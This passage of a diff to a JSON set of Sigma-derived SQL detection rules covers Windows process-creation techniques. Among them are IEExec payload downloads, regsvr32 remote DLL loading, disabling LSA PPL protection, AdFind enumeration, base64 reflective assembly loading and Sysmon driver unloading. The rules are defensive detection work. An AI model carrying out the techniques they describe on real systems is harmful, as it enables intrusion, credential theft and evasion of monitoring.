ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Legitimate testing of Microsoft UI parts." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "status": "experimental", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.010" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administration activity" + "Authorized administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Google Drive", + "Citrix" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" - }, - { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - "description": "Commandline to launch powershell with a base64 payload", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "status": "test", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE 